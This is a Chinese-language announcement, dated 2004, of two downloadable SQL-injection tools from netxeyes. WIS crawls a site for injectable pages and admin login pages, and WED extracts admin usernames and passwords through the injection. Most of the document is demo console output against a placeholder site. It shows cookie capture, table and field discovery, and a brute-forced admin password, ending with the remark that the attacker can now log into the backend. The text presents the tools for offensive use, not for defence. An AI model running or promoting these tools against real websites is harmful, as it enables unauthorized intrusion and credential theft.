信息来源:netxeyes
http://www.netxeyes.com/wis.rar
http://www.netxeyes.com/wed.rar
[WED] 2004/08/29
WED (Web Entry Detector),针对存在SQL Injection的网站对管理帐号进行扫描。
Demo: 对通过WIS扫描出的存在SQL Injection漏洞的网站进行后台管理帐号扫描
C:\>WED.exe
http://www.someaspsite.com/shownews.asp?newsid=1544
Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26
http://www.netXeyes.com,
security@vip.sina.com
#### Phrase 0: Check Enviroment ####
Get Row 1, Set Sensitive 250, Max Threads is 30
File C:\TableName.dic Opened
File C:\UserField.dic Opened
File C:\PassField.dic Opened
#### Phrase 1: Process Argv ####
Host:
www.someaspsite.com
Page:/shownews.asp?newsid=1544
#### Phrase 2: Detect SQL Injection ####
SQL Injection Detected.
#### Phrase 3: Get Cookies ####
Tag: 2017
Cookie: ASPSESSIONIDSADSBTAS=BIMAMMNCLCCIFICPLNEMFKND; path=/
#### Phrase 4: Starting Get Table Name ####
Tag: 45
Got Table Name is "users"
#### Phrase 5: Starting Get Name Field ####
Tag: 45
Got Name Field is "name"
#### Phrase 6: Starting Get Length of Field "name" ####
Tag: 24
Got Length of Field "name" is: 13
#### Phrase 7: Starting Get Password Field ####
Tag: 45
Got Password Field is "pwd"
#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 9
#### Phrase 9: Starting Brute Field "name" and "pwd" (Access Mode) ####
name is: administrator
pwd is: admin@bvn
C:\>
到这一步,就可以通过WIS扫描获得的管理页面后台登陆了。
[WIS] 2004/08/29
WIS (Web Injection Scanner),自动对整个网站进行SQL Injection 脆弱性扫描,并且能够扫描后台登陆界面。
Demo1: 扫描整个网站,找出存在SQL Injection的页面
C:\>wis
http://www.someaspsite.com/
Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08
http://www.netXeyes.com security@vip.sina.com
Scanning
http://www.someaspsite.com/, Page: Unlimited
Patient, Please....
(001 + 000) Checking: /shownews.asp?newsid=204
SQL Injection Found: /shownews.asp?newsid=204
Injection Page Final Result:
============================
/shownews.asp?newsid=204
C:\>
Demo2: 扫描后台管理页面
C:\>wis
http://www.someaspsite.com/ /A
Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08
http://www.netXeyes.com security@vip.sina.com
Scanning
http://www.someaspsite.com/, Page: Unlimited, Detect Access Page
Patient, Please....
(004 + 005) Access Page: /www.asp
(004 + 006) Access Page: /wwwstats.asp
(004 + 006) Access Page: /wwwlog.asp
(004 + 006) Access Page: /wstats.asp
(004 + 006) Access Page: /work.asp
(005 + 007) Access Page: /webstats.asp
(000 + 016) Access Page: /gansu2/tjhg.files/admin_index.asp
(000 + 015) Access Page: /gansu2/tjhg.files/admin.asp
(000 + 012) Access Page: /gansu2/gs.files/admin_index.asp
(000 + 011) Access Page: /gansu2/gs.files/index_admin.asp
(000 + 010) Access Page: /gansu2/tjhg.files/admin_del.asp
(000 + 009) Access Page: /gansu2/ddddd.files/manage.asp
(000 + 003) Access Page: /gansu2/ddddd.files/index_admin.asp
Access Page Final Result:
============================
/gansu2/login.asp (200 OK)
Scan Finished
